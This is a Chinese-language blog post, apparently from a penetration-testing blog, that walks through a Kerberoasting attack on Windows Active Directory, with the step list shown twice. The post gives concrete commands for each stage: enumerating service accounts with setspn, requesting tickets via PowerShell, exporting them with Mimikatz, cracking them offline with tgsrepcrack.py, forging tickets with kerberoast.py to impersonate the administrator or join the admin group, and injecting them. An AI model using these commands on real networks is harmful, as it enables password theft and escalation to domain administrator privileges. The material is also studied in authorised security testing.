j4s0nh4ck
- 浏览: 287759 次
-
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
参考:
1. http://securityweekly.com/2014/09/26/derbycon-attacking-kerberos-talk-ill-be-checking-out-and-you-should-too/
2. https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
3. https://github.com/nidem/kerberoast
方法:
1. 查找服务账户
2. 识别user账户,忽略机器账户,通常机器账户密码不太容易破解
3. 获得ticket
原型是:
4. 使用Mimikatz从RAM中获得tickets
5. 离线破解服务口令
6. 将user伪装成另一个user
或者把user加入一个组(本例为admin组)
7. 使用Mimikatz注入内存
1. http://securityweekly.com/2014/09/26/derbycon-attacking-kerberos-talk-ill-be-checking-out-and-you-should-too/
2. https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
3. https://github.com/nidem/kerberoast
方法:
1. 查找服务账户
setspn -T DOMAINNAME -F -Q */*
2. 识别user账户,忽略机器账户,通常机器账户密码不太容易破解
3. 获得ticket
PS C:\> Add-Type -AssemblyName System.IdentityModel PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
原型是:
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -Arguemtlist “HTTP / YOURKERB SERVER”
4. 使用Mimikatz从RAM中获得tickets
mimikatz# kerberos::list /export
5. 离线破解服务口令
tgsrepcrack.py -w wordlist.txt *.kirbi
6. 将user伪装成另一个user
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500
或者把user加入一个组(本例为admin组)
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512
7. 使用Mimikatz注入内存
kerberos::ptt sql.kirbi
分享到:
发表评论
-
[图] windows 10
2015-08-18 20:37 311网上下载的图片,忘了来源 -
windows提权集合
2015-06-30 00:23 589https://blog.netspi.com/5-ways- ... -
[转]Access to every PC and become local Admin
2015-06-29 21:50 530原文地址:http://www.gosecure.it/blo ... -
[转]Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network
2015-06-29 21:46 1633原文地址:https://www.trustwave.com/ ... -
[转]如何获得window管理员权限
2015-06-29 21:21 474引用A tutorial on how to get into ... -
Window提权基本步骤
2015-06-03 22:00 777原文地址: http://www.fuzzysecurity. ... -
[转]malware persistence
2015-05-06 23:46 410原文地址:http://jumpespjump.blogspo ... -
[转]backdoor a windows domain
2015-05-06 22:56 497原文地址:http://jumpespjump.blogspo ... -
[译]解密MSSQL密码
2015-03-26 00:43 2876原文地址: https://blog.ne ... -
[转]badsamba
2015-03-20 00:55 323原文地址:http://blog.gdssecurity.co ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4126原文地址:https://jimshaver.net/2015 ... -
[转]John the ripper hash format cheetsheet
2015-03-10 01:30 1033原文地址:http://pentestmonkey.net/c ... -
window增加硬盘性能方法
2015-02-05 01:03 355参考地址:http://way2h.blogspot.com/ ... -
[译]Skeleton Key Malware & Mimikatz
2015-01-28 20:29 804原文地址: http://adsecurity.org/?p= ... -
绕过PowerShell执行策略的15种方法
2015-01-28 02:27 962https://blog.netspi.com/15-ways ... -
[翻译]oledump: Extracting Embedded EXE From DOC
2015-01-04 22:40 942原文地址:http://blog.didierstevens. ... -
[工具]volatility----Windows内存取证
2015-01-04 22:01 1543下载地址:https://github.com/volatil ... -
[译]Windows提权:ahcache.sys/NtApphelpCacheControl
2015-01-03 21:12 1028原文地址:https://code.google.com/p/ ... -
[译]使用Volatility从memory dump获得密码
2014-12-30 12:27 3807原文地址:https://cyberarms.wordpres ... -
man crunch
2014-12-28 23:35 400http://adaywithtape.blogspot.co ...
相关推荐
**Kerberos协议详解** Kerberos是一种网络身份验证协议,由麻省理工学院开发,旨在提供安全的网络服务。它的核心理念是通过共享密钥的方式进行身份验证,确保通信双方的安全交互。Java语言实现的Kerberos允许开发者...
3. **时间同步**:为了防止重放攻击,Kerberos 使用时间戳,要求客户端和服务端有精确的时间同步。 4. **加密机制**:Kerberos 使用对称加密算法,如DES或AES,以及哈希函数进行数据加密和完整性校验。 **二、...
它通过提供强大的加密机制,确保用户在访问网络资源时的身份安全,防止中间人攻击和其他形式的欺诈。Kerberos的核心概念是基于密钥分发中心(KDC)来实现的,它包括认证服务器(AS)和票据授予服务器(TGS)。此协议...
Kerberos 协议可以保护网络实体免受窃听和重复攻击。 Kerberos 协议的主要设计者是 Steve Miller 和 Clifford Neuman,它在 1980 年末发布了第 4 版本,该版本主要针对 Project Athena。 Version 5 由 John Kohl ...
Kerberos 单点登录是一种身份验证方法,它基于Kerberos V5协议,旨在提供安全、便捷的网络访问体验。Kerberos的核心是Key Distribution Center (KDC),它存储和管理用户的加密密钥,使得用户只需一次登录即可访问多...
### Kerberos简介与工作原理 #### 一、Kerberos概述 Kerberos是一种网络认证协议,其设计目的是为了在不安全的网络环境中为客户端/服务器应用提供强大的身份验证服务。该协议通过加密技术来确保数据的安全性,并且...
首先,`Kerberos认证`是一种基于票据的认证机制,它通过三向握手确保了通信双方的身份,并防止中间人攻击。在Hive中启用Kerberos,可以确保只有经过授权的用户才能访问数据。 `Hive JdbcListener` 是一个监听器,...
为了保障通信的安全,Kerberos采取了时间戳对比措施以防止重放攻击。时间戳是用户请求的一部分,它必须在合理的时间范围内才有效。除此之外,Kerberos还支持权限认证服务,可以在用户与TGS通信时添加权限认证的步骤...
Kerberos基于密钥分发中心(KDC)的概念,它允许用户在一个可信的环境中进行安全的交互,防止中间人攻击和其他类型的欺骗。 **Kerberos工作原理** Kerberos的核心组件包括认证服务器(AS)、票据授予服务器(TGS)...
Kerberos协议的设计针对的是客户-服务器模型,它能够实现客户端与服务器之间的相互认证,从而保障通信的安全,如防止窃听、重放攻击和数据完整性等。 Kerberos协议的历史可以追溯到麻省理工学院(MIT)为了保护...
3. **Kerberos攻击**:mimikatz可以执行Golden Ticket和Silver Ticket攻击,这些攻击允许攻击者伪造Kerberos票证,实现无密码登录或权限提升。 4. **SEH(结构化异常处理)溢出利用**:mimikatz可以用于分析和利用...
mimikatz 还支持对Kerberos协议的攻击,如Golden Ticket和Silver Ticket攻击。Golden Ticket允许攻击者创建一个假的TGT(Ticket-Granting Ticket),而Silver Ticket则可以伪造服务票证,绕过身份验证过程。 **4. ...
**Kerberos API** Kerberos API 是一个关键的安全协议,尤其在软件逆向工程领域中扮演着重要角色。这个工具被广泛应用于...通过深入研究Kerberos API,我们不仅可以保护系统免受恶意攻击,还能推动安全技术的进步。
例如,Kerberos要求时间同步较为严格,因为它使用时间戳来防止重放攻击,如果系统时间不同步可能会导致认证失败。另外,密钥管理也比较复杂,特别是随着用户和服务器数量的增加,密钥分发和管理的难度也会相应提高。...
- **时效性**:为了防止重放攻击,Kerberos中的票据和消息都有明确的有效期。 - **双向认证**:除了客户端对服务端的认证之外,服务端也可以通过票据和服务票据对客户端进行认证。 #### 六、Kerberos的应用实例 - ...
然而,Kerberos也存在一些潜在的弱点,例如对密码安全性的依赖,以及可能的中间人攻击,因此在实际部署中需要结合其他安全措施共同使用。 总的来说,理解和掌握Kerberos协议对于网络管理员、系统安全专家以及进行域...
Kerberos的优势在于其强大的安全性,能够有效防止重放攻击、中间人攻击等威胁。同时,Kerberos也支持多领域间的互操作性,使得不同组织之间可以方便地共享资源和服务。 #### Hadoop与Kerberos的集成 随着大数据...
它基于密钥分发中心(KDC)的概念,确保用户与服务器之间的通信是安全的,防止中间人攻击和其他形式的身份欺诈。在本压缩包中,你将找到关于Kerberos用户、安装过程以及管理员操作的相关资料。 1. **Kerberos用户**...
3. **Kerberos攻击**:Impacket支持Kerberos协议,可以用于票证欺骗和Golden Ticket攻击。 **六、结论** Impacket 0.9.9.9是一个强大的网络安全工具,它提供了一整套协议处理和安全测试的解决方案。无论是专业安全...
Kerberos通过加密技术确保了用户的身份,防止中间人攻击,保证了数据传输的安全性。urllib_kerberos-0.2.0将这一功能集成到Python的网络请求库中,使得开发者能够更方便地处理需要Kerberos认证的HTTP请求。 在使用...